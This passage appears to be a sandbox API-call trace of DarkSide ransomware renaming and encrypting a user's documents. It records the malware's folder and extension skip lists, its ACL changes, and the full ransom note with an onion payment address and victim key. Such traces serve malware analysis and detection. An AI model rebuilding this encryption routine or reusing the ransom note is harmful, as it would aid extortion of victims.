dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0157.752] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.752] ReadFile (in: hFile=0x1e0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.753] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x23ba6888 [0157.753] RtlComputeCrc32 (PartialCrc=0x6888, Buffer=0x32ec24, Length=0x80) returned 0x9d75c857 [0157.753] RtlComputeCrc32 (PartialCrc=0xc857, Buffer=0x32ec24, Length=0x80) returned 0xecb3775e [0157.753] RtlComputeCrc32 (PartialCrc=0x775e, Buffer=0x32ec24, Length=0x80) returned 0x5edf4363 [0157.753] RtlComputeCrc32 (PartialCrc=0x4363, Buffer=0x32ec24, Length=0x80) returned 0xd6e021a4 [0157.753] CloseHandle (hObject=0x1e0) returned 1 [0157.753] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.753] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx" [0157.753] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx") returned 0x41 [0157.753] wcscpy (in: _Dest=0x32200d2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.753] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mke0mxpff7kqluey.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mke0mxpff7kqluey.pptx.c06622a1"), dwFlags=0x8) returned 1 [0157.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mKe0mxpFf7kQlueY.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mke0mxpff7kqluey.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0157.756] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.756] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3750020 [0157.763] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53f83334 [0157.763] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6cb8fa04 [0157.763] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x333eb0ca [0157.763] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x248536bc [0157.763] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x14cd6871 [0157.763] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa4725d [0157.763] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63916cbc [0157.763] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3730377c [0157.766] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3750094, Length=0x80) returned 0xf2fd1994 [0157.766] RtlComputeCrc32 (PartialCrc=0x1994, Buffer=0x3750094, Length=0x80) returned 0xdf07cba2 [0157.766] RtlComputeCrc32 (PartialCrc=0xcba2, Buffer=0x3750094, Length=0x80) returned 0xfff02b24 [0157.766] RtlComputeCrc32 (PartialCrc=0x2b24, Buffer=0x3750094, Length=0x80) returned 0xb98ebf07 [0157.766] RtlComputeCrc32 (PartialCrc=0xbf07, Buffer=0x3750094, Length=0x80) returned 0x46bd281 [0157.766] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0157.766] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.767] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.768] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0157.768] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0157.769] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0157.769] _wcsicmp (_Str1="$recycle.bin", _Str2="My Shapes") returned -73 [0157.769] wcslen (_String="$recycle.bin") returned 0xc [0157.769] _wcsicmp (_Str1="config.msi", _Str2="My Shapes") returned -10 [0157.769] wcslen (_String="config.msi") returned 0xa [0157.769] _wcsicmp (_Str1="$windows.~bt", _Str2="My Shapes") returned -73 [0157.769] wcslen (_String="$windows.~bt") returned 0xc [0157.769] _wcsicmp (_Str1="$windows.~ws", _Str2="My Shapes") returned -73 [0157.769] wcslen (_String="$windows.~ws") returned 0xc [0157.769] _wcsicmp (_Str1="windows", _Str2="My Shapes") returned 10 [0157.769] wcslen (_String="windows") returned 0x7 [0157.769] _wcsicmp (_Str1="appdata", _Str2="My Shapes") returned -12 [0157.769] wcslen (_String="appdata") returned 0x7 [0157.769] _wcsicmp (_Str1="application data", _Str2="My Shapes") returned -12 [0157.769] wcslen (_String="application data") returned 0x10 [0157.769] _wcsicmp (_Str1="boot", _Str2="My Shapes") returned -11 [0157.769] wcslen (_String="boot") returned 0x4 [0157.769] _wcsicmp (_Str1="google", _Str2="My Shapes") returned -6 [0157.769] wcslen (_String="google") returned 0x6 [0157.769] _wcsicmp (_Str1="mozilla", _Str2="My Shapes") returned -10 [0157.769] wcslen (_String="mozilla") returned 0x7 [0157.769] _wcsicmp (_Str1="program files", _Str2="My Shapes") returned 3 [0157.769] wcslen (_String="program files") returned 0xd [0157.769] _wcsicmp (_Str1="program files (x86)", _Str2="My Shapes") returned 3 [0157.769] wcslen (_String="program files (x86)") returned 0x13 [0157.769] _wcsicmp (_Str1="programdata", _Str2="My Shapes") returned 3 [0157.769] wcslen (_String="programdata") returned 0xb [0157.769] _wcsicmp (_Str1="system volume information", _Str2="My Shapes") returned 6 [0157.770] wcslen (_String="system volume information") returned 0x19 [0157.770] _wcsicmp (_Str1="tor browser", _Str2="My Shapes") returned 7 [0157.770] wcslen (_String="tor browser") returned 0xb [0157.770] _wcsicmp (_Str1="windows.old", _Str2="My Shapes") returned 10 [0157.770] wcslen (_String="windows.old") returned 0xb [0157.770] _wcsicmp (_Str1="intel", _Str2="My Shapes") returned -4 [0157.770] wcslen (_String="intel") returned 0x5 [0157.770] _wcsicmp (_Str1="msocache", _Str2="My Shapes") returned -6 [0157.770] wcslen (_String="msocache") returned 0x8 [0157.770] _wcsicmp (_Str1="perflogs", _Str2="My Shapes") returned 3 [0157.770] wcslen (_String="perflogs") returned 0x8 [0157.770] _wcsicmp (_Str1="x64dbg", _Str2="My Shapes") returned 11 [0157.770] wcslen (_String="x64dbg") returned 0x6 [0157.770] _wcsicmp (_Str1="public", _Str2="My Shapes") returned 3 [0157.770] wcslen (_String="public") returned 0x6 [0157.770] _wcsicmp (_Str1="all users", _Str2="My Shapes") returned -12 [0157.770] wcslen (_String="all users") returned 0x9 [0157.770] _wcsicmp (_Str1="default", _Str2="My Shapes") returned -9 [0157.770] wcslen (_String="default") returned 0x7 [0157.770] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0157.770] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 0x2d [0157.770] wcscpy (in: _Dest=0x208e78, _Source="My Shapes" | out: _Dest="My Shapes") returned="My Shapes" [0157.770] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.770] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.771] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0157.771] GetNamedSecurityInfoW () returned 0x0 [0157.772] SetEntriesInAclW () returned 0x0 [0157.772] SetNamedSecurityInfoW () returned 0x0 [0157.775] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17c3b0) returned 1 [0157.775] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0157.775] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes")) returned 1 [0157.775] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0157.775] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0157.835] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0157.836] CloseHandle (hObject=0x1a4) returned 1 [0157.836] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0157.836] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes")) returned 0x14 [0157.836] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="" [0157.836] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 0x36 [0157.836] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0157.837] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x8bc7bb20, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8bc7bb20, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.837] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.837] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0157.837] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0157.837] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0157.837] wcslen (_String="autorun.inf") returned 0xb [0157.837] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0157.837] wcslen (_String="boot.ini") returned 0x8 [0157.837] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0157.837] wcslen (_String="bootfont.bin") returned 0xc [0157.838] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0157.838] wcslen (_String="bootsect.bak") returned 0xc [0157.838] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0157.838] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0157.838] _wcsicmp (_Str1="Favorites.vss", _Str2="README.c06622a1.TXT") returned -12 [0157.838] wcsstr (_Str="Favorites.vss", _SubStr="README") returned 0x0 [0157.838] _wcsicmp (_Str1="autorun.inf", _Str2="Favorites.vss") returned -5 [0157.838] wcslen (_String="autorun.inf") returned 0xb [0157.838] _wcsicmp (_Str1="boot.ini", _Str2="Favorites.vss") returned -4 [0157.838] wcslen (_String="boot.ini") returned 0x8 [0157.838] _wcsicmp (_Str1="bootfont.bin", _Str2="Favorites.vss") returned -4 [0157.838] wcslen (_String="bootfont.bin") returned 0xc [0157.838] _wcsicmp (_Str1="bootsect.bak", _Str2="Favorites.vss") returned -4 [0157.838] wcslen (_String="bootsect.bak") returned 0xc [0157.838] _wcsicmp (_Str1="desktop.ini", _Str2="Favorites.vss") returned -2 [0157.838] wcslen (_String="desktop.ini") returned 0xb [0157.838] _wcsicmp (_Str1="iconcache.db", _Str2="Favorites.vss") returned 3 [0157.838] wcslen (_String="iconcache.db") returned 0xc [0157.838] _wcsicmp (_Str1="ntldr", _Str2="Favorites.vss") returned 8 [0157.838] wcslen (_String="ntldr") returned 0x5 [0157.838] _wcsicmp (_Str1="ntuser.dat", _Str2="Favorites.vss") returned 8 [0157.838] wcslen (_String="ntuser.dat") returned 0xa [0157.838] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Favorites.vss") returned 8 [0157.838] wcslen (_String="ntuser.dat.log") returned 0xe [0157.838] _wcsicmp (_Str1="ntuser.ini", _Str2="Favorites.vss") returned 8 [0157.838] wcslen (_String="ntuser.ini") returned 0xa [0157.839] _wcsicmp (_Str1="thumbs.db", _Str2="Favorites.vss") returned 14 [0157.839] wcslen (_String="thumbs.db") returned 0x9 [0157.839] _wcsicmp (_Str1="386", _Str2="vss") returned -67 [0157.839] wcslen (_String="386") returned 0x3 [0157.839] _wcsicmp (_Str1="adv", _Str2="vss") returned -21 [0157.839] wcslen (_String="adv") returned 0x3 [0157.839] _wcsicmp (_Str1="ani", _Str2="vss") returned -21 [0157.839] wcslen (_String="ani") returned 0x3 [0157.839] _wcsicmp (_Str1="bat", _Str2="vss") returned -20 [0157.839] wcslen (_String="bat") returned 0x3 [0157.839] _wcsicmp (_Str1="bin", _Str2="vss") returned -20 [0157.839] wcslen (_String="bin") returned 0x3 [0157.839] _wcsicmp (_Str1="cab", _Str2="vss") returned -19 [0157.839] wcslen (_String="cab") returned 0x3 [0157.839] _wcsicmp (_Str1="cmd", _Str2="vss") returned -19 [0157.839] wcslen (_String="cmd") returned 0x3 [0157.839] _wcsicmp (_Str1="com", _Str2="vss") returned -19 [0157.839] wcslen (_String="com") returned 0x3 [0157.839] _wcsicmp (_Str1="cpl", _Str2="vss") returned -19 [0157.839] wcslen (_String="cpl") returned 0x3 [0157.839] _wcsicmp (_Str1="cur", _Str2="vss") returned -19 [0157.839] wcslen (_String="cur") returned 0x3 [0157.839] _wcsicmp (_Str1="deskthemepack", _Str2="vss") returned -18 [0157.839] wcslen (_String="deskthemepack") returned 0xd [0157.839] _wcsicmp (_Str1="diagcab", _Str2="vss") returned -18 [0157.839] wcslen (_String="diagcab") returned 0x7 [0157.840] _wcsicmp (_Str1="diagcfg", _Str2="vss") returned -18 [0157.840] wcslen (_String="diagcfg") returned 0x7 [0157.840] _wcsicmp (_Str1="diagpkg", _Str2="vss") returned -18 [0157.840] wcslen (_String="diagpkg") returned 0x7 [0157.840] _wcsicmp (_Str1="dll", _Str2="vss") returned -18 [0157.840] wcslen (_String="dll") returned 0x3 [0157.840] _wcsicmp (_Str1="drv", _Str2="vss") returned -18 [0157.840] wcslen (_String="drv") returned 0x3 [0157.840] _wcsicmp (_Str1="exe", _Str2="vss") returned -17 [0157.840] wcslen (_String="exe") returned 0x3 [0157.840] _wcsicmp (_Str1="hlp", _Str2="vss") returned -14 [0157.840] wcslen (_String="hlp") returned 0x3 [0157.840] _wcsicmp (_Str1="icl", _Str2="vss") returned -13 [0157.840] wcslen (_String="icl") returned 0x3 [0157.840] _wcsicmp (_Str1="icns", _Str2="vss") returned -13 [0157.840] wcslen (_String="icns") returned 0x4 [0157.840] _wcsicmp (_Str1="ico", _Str2="vss") returned -13 [0157.840] wcslen (_String="ico") returned 0x3 [0157.840] _wcsicmp (_Str1="ics", _Str2="vss") returned -13 [0157.840] wcslen (_String="ics") returned 0x3 [0157.840] _wcsicmp (_Str1="idx", _Str2="vss") returned -13 [0157.840] wcslen (_String="idx") returned 0x3 [0157.840] _wcsicmp (_Str1="ldf", _Str2="vss") returned -10 [0157.840] wcslen (_String="ldf") returned 0x3 [0157.840] _wcsicmp (_Str1="lnk", _Str2="vss") returned -10 [0157.840] wcslen (_String="lnk") returned 0x3 [0157.840] _wcsicmp (_Str1="mod", _Str2="vss") returned -9 [0157.840] wcslen (_String="mod") returned 0x3 [0157.840] _wcsicmp (_Str1="mpa", _Str2="vss") returned -9 [0157.841] wcslen (_String="mpa") returned 0x3 [0157.841] _wcsicmp (_Str1="msc", _Str2="vss") returned -9 [0157.841] wcslen (_String="msc") returned 0x3 [0157.841] _wcsicmp (_Str1="msp", _Str2="vss") returned -9 [0157.841] wcslen (_String="msp") returned 0x3 [0157.841] _wcsicmp (_Str1="msstyles", _Str2="vss") returned -9 [0157.841] wcslen (_String="msstyles") returned 0x8 [0157.841] _wcsicmp (_Str1="msu", _Str2="vss") returned -9 [0157.841] wcslen (_String="msu") returned 0x3 [0157.841] _wcsicmp (_Str1="nls", _Str2="vss") returned -8 [0157.841] wcslen (_String="nls") returned 0x3 [0157.841] _wcsicmp (_Str1="nomedia", _Str2="vss") returned -8 [0157.841] wcslen (_String="nomedia") returned 0x7 [0157.841] _wcsicmp (_Str1="ocx", _Str2="vss") returned -7 [0157.841] wcslen (_String="ocx") returned 0x3 [0157.841] _wcsicmp (_Str1="prf", _Str2="vss") returned -6 [0157.841] wcslen (_String="prf") returned 0x3 [0157.841] _wcsicmp (_Str1="ps1", _Str2="vss") returned -6 [0157.841] wcslen (_String="ps1") returned 0x3 [0157.841] _wcsicmp (_Str1="rom", _Str2="vss") returned -4 [0157.841] wcslen (_String="rom") returned 0x3 [0157.841] _wcsicmp (_Str1="rtp", _Str2="vss") returned -4 [0157.841] wcslen (_String="rtp") returned 0x3 [0157.841] _wcsicmp (_Str1="scr", _Str2="vss") returned -3 [0157.841] wcslen (_String="scr") returned 0x3 [0157.841] _wcsicmp (_Str1="shs", _Str2="vss") returned -3 [0157.841] wcslen (_String="shs") returned 0x3 [0157.841] _wcsicmp (_Str1="spl", _Str2="vss") returned -3 [0157.841] wcslen (_String="spl") returned 0x3 [0157.841] _wcsicmp (_Str1="sys", _Str2="vss") returned -3 [0157.842] wcslen (_String="sys") returned 0x3 [0157.842] _wcsicmp (_Str1="theme", _Str2="vss") returned -2 [0157.842] wcslen (_String="theme") returned 0x5 [0157.842] _wcsicmp (_Str1="themepack", _Str2="vss") returned -2 [0157.842] wcslen (_String="themepack") returned 0x9 [0157.842] _wcsicmp (_Str1="wpx", _Str2="vss") returned 1 [0157.842] wcslen (_String="wpx") returned 0x3 [0157.842] _wcsicmp (_Str1="lock", _Str2="vss") returned -10 [0157.842] wcslen (_String="lock") returned 0x4 [0157.842] _wcsicmp (_Str1="key", _Str2="vss") returned -11 [0157.842] wcslen (_String="key") returned 0x3 [0157.842] _wcsicmp (_Str1="hta", _Str2="vss") returned -14 [0157.842] wcslen (_String="hta") returned 0x3 [0157.842] _wcsicmp (_Str1="msi", _Str2="vss") returned -9 [0157.842] wcslen (_String="msi") returned 0x3 [0157.842] _wcsicmp (_Str1="pdb", _Str2="vss") returned -6 [0157.842] wcslen (_String="pdb") returned 0x3 [0157.842] _wcsicmp (_Str1="sqlite", _Str2="vss") returned -3 [0157.842] wcslen (_String="sqlite") returned 0x6 [0157.842] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes")) returned 0x14 [0157.842] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbe35a0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8bbe35a0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8bc7bb20, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0157.842] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0157.842] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0157.842] _wcsicmp (_Str1="$recycle.bin", _Str2="_private") returned -59 [0157.843] wcslen (_String="$recycle.bin") returned 0xc [0157.843] _wcsicmp (_Str1="config.msi", _Str2="_private") returned 4 [0157.843] wcslen (_String="config.msi") returned 0xa [0157.843] _wcsicmp (_Str1="$windows.~bt", _Str2="_private") returned -59 [0157.843] wcslen (_String="$windows.~bt") returned 0xc [0157.843] _wcsicmp (_Str1="$windows.~ws", _Str2="_private") returned -59 [0157.843] wcslen (_String="$windows.~ws") returned 0xc [0157.843] _wcsicmp (_Str1="windows", _Str2="_private") returned 24 [0157.843] wcslen (_String="windows") returned 0x7 [0157.843] _wcsicmp (_Str1="appdata", _Str2="_private") returned 2 [0157.843] wcslen (_String="appdata") returned 0x7 [0157.843] _wcsicmp (_Str1="application data", _Str2="_private") returned 2 [0157.843] wcslen (_String="application data") returned 0x10 [0157.843] _wcsicmp (_Str1="boot", _Str2="_private") returned 3 [0157.843] wcslen (_String="boot") returned 0x4 [0157.843] _wcsicmp (_Str1="google", _Str2="_private") returned 8 [0157.843] wcslen (_String="google") returned 0x6 [0157.843] _wcsicmp (_Str1="mozilla", _Str2="_private") returned 14 [0157.843] wcslen (_String="mozilla") returned 0x7 [0157.843] _wcsicmp (_Str1="program files", _Str2="_private") returned 17 [0157.843] wcslen (_String="program files") returned 0xd [0157.843] _wcsicmp (_Str1="program files (x86)", _Str2="_private") returned 17 [0157.843] wcslen (_String="program files (x86)") returned 0x13 [0157.843] _wcsicmp (_Str1="programdata", _Str2="_private") returned 17 [0157.843] wcslen (_String="programdata") returned 